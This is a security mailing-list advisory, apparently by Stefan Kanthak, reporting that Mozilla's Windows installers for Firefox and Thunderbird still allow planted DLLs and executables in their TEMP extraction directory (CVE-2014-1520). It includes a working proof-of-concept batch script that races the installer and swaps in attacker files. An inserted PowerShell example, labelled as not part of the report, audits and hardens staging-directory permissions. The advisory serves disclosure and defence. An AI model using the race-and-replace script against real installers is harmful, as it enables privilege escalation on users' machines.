Hi @ll,
<http://ift.tt/1Uj8MFd> should
have fixed CVE-2014-1520 in Mozilla's executable installers for
Windows ... but does NOT!
JFTR: this type of vulnerability (really: a bloody stupid trivial
beginner's error!) is well-known and well-documented as
<http://ift.tt/1Uuempo>.
Proof of concept/demonstration:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
0. download "Firefox Setup Stub 47.0.exe", "Firefox Setup 47.0.exe",
"Firefox Setup 45.2.0esr.exe" or "Thunderbird Setup 45.1.1.exe"
and save them in an arbitrary directory;
1. download <http://ift.tt/1Uj9ceP>
plus <http://ift.tt/1UudhxX> and
save them in an(other) arbitrary directory;
2. start your editor, copy and paste the following 10 lines and
save them as "POC.CMD" in the same directory as "SHFOLDER.DLL"
and "SENTINEL.EXE" downloaded in step 1:
:WAIT1
@If Not Exist "%TEMP%\7z*.tmp" Goto :WAIT1
For /D %%! In ("%TEMP%\7z*.tmp") Do Set foobar=%%!
Copy "%~dp0shfolder.dll" "%foobar%\shfolder.dll"
:WAIT2
@If Not Exist "%foobar%\core\maintenanceservice.exe" Goto :WAIT2
Copy "%~dp0sentinel.exe" "%foobar%\core\maintenanceservice.exe"
:WAIT3
@If Not Exist "%foobar%\core\maintenanceservice_installer.exe" Goto :WAIT3
Copy "%~dp0sentinel.exe" "%foobar%\core\maintenanceservice_installer.exe"
3. execute the batch script "POC.CMD" created in step 2;
4. execute "Firefox Setup Stub 47.0.exe", "Firefox Setup 47.0.exe",
"Firefox Setup 45.2.0esr.exe" or "Thunderbird Setup 45.1.1.exe"
downloaded in step 0 and proceed as directed: notice the message
boxes displayed from the copies of "SHFOLDER.DLL" and "SENTINEL.EXE"
placed by the batch script started in step 3 in the unsafe TEMP
subdirectory created by Mozilla's vulnerable executable installers!
PWNED!
Mitigation(s):
~~~~~~~~~~~~~~
0. don't use executable installers. DUMP THEM, NOW!
1. see <http://ift.tt/1Uj7F8u> as well as
<http://ift.tt/1UuebKV>.
2. stay away from Mozilla's vulnerable installers for their Windows
software (at least until Mozilla starts to develop a sense for
the safety and security of their users).
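The defensive counterpart to the demonstration above, added here as an example (it is not code from this report, nor Mozilla's): an elevated installer stages its files in a directory that only SYSTEM and Administrators can write to, and an audit function lists who else could write into a directory such as "%TEMP%\7z*.tmp". It assumes Windows PowerShell 5.1 run elevated; the choice of %ProgramData% as the parent directory is an assumption.

```powershell
using namespace System.IO
using namespace System.Security.AccessControl
using namespace System.Security.Principal

# Principals an elevated installer may trust to write into its staging directory.
$TrustedSids = @(
    [SecurityIdentifier]::new([WellKnownSidType]::LocalSystemSid, $null)
    [SecurityIdentifier]::new([WellKnownSidType]::BuiltinAdministratorsSid, $null)
)
# Any of these rights lets a principal plant or replace files in a directory.
$WriteMask = [FileSystemRights]::CreateFiles -bor [FileSystemRights]::CreateDirectories -bor
             [FileSystemRights]::Delete -bor [FileSystemRights]::DeleteSubdirectoriesAndFiles -bor
             [FileSystemRights]::ChangePermissions -bor [FileSystemRights]::TakeOwnership

# Audit: list every Allow ACE that grants write rights to anyone but SYSTEM/Administrators.
# Run against %TEMP%\7z*.tmp it reports the unelevated user, which is the whole problem.
function Test-DirWritableByOthers {
    param([Parameter(Mandatory)][string]$Path)
    $acl = Get-Acl -LiteralPath $Path
    $acl.GetAccessRules($true, $true, [SecurityIdentifier]) | Where-Object {
        $_.AccessControlType -eq [AccessControlType]::Allow -and
        ($_.FileSystemRights -band $WriteMask) -ne 0 -and
        $TrustedSids.Value -notcontains $_.IdentityReference.Value
    } | ForEach-Object {
        [pscustomobject]@{ Identity = $_.IdentityReference.Translate([NTAccount]).Value
                           Rights   = $_.FileSystemRights }
    }
}
# Hardened staging: create the directory together with a protected DACL, then
# verify it before trusting it. $Parent defaulting to %ProgramData% is an assumption.
function New-PrivateStagingDir {
    param([string]$Parent = $env:ProgramData)
    $path = Join-Path $Parent ('setup-' + [guid]::NewGuid().ToString('N'))
    if (Test-Path -LiteralPath $path) { throw "staging path already exists: $path" }
    $sec = [DirectorySecurity]::new()
    $sec.SetAccessRuleProtection($true, $false)      # drop inherited ACEs from the parent
    $sec.SetOwner($TrustedSids[1])                   # owner = Administrators, not the user
    foreach ($sid in $TrustedSids) {
        $sec.AddAccessRule([FileSystemAccessRule]::new($sid, [FileSystemRights]::FullControl,
            [InheritanceFlags]'ContainerInherit, ObjectInherit', [PropagationFlags]::None,
            [AccessControlType]::Allow))
    }
    # One call creates the directory with this DACL: no window with a default, user-writable ACL.
    $dir = [Directory]::CreateDirectory($path, $sec)
    $owner = (Get-Acl -LiteralPath $dir.FullName).GetOwner([SecurityIdentifier]).Value
    if ($TrustedSids.Value -notcontains $owner -or (Test-DirWritableByOthers $dir.FullName)) {
        Remove-Item -LiteralPath $dir.FullName -Recurse -Force
        throw "staging directory $path is not private; refusing to load anything from it"
    }
    return $dir.FullName
}
```

Run `Test-DirWritableByOthers "$env:TEMP"` from a normal session to see the user's own Full Control ACE, which is what makes the installer's extraction directory unsafe the moment an elevated process loads code from it.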
stay tuned
Stefan Kanthak
Timeline:
~~~~~~~~~
2015-10-25 <http://ift.tt/1Uj7UjP>
not even an attempt to fix this vulnerability (check but
<http://ift.tt/1Uueu8z
upport-program/>)
2016-04-30 <http://ift.tt/1Uj9hPs>
<http://ift.tt/1Uuf8CU>
<http://ift.tt/1Uj8LAZ>
<http://ift.tt/1UueEg7>
<http://ift.tt/1Uj7qKE>
<http://ift.tt/1UueuFA>
<http://ift.tt/1Uj9OB1>
)
2016-06-15 deadline expired after 45 days, report published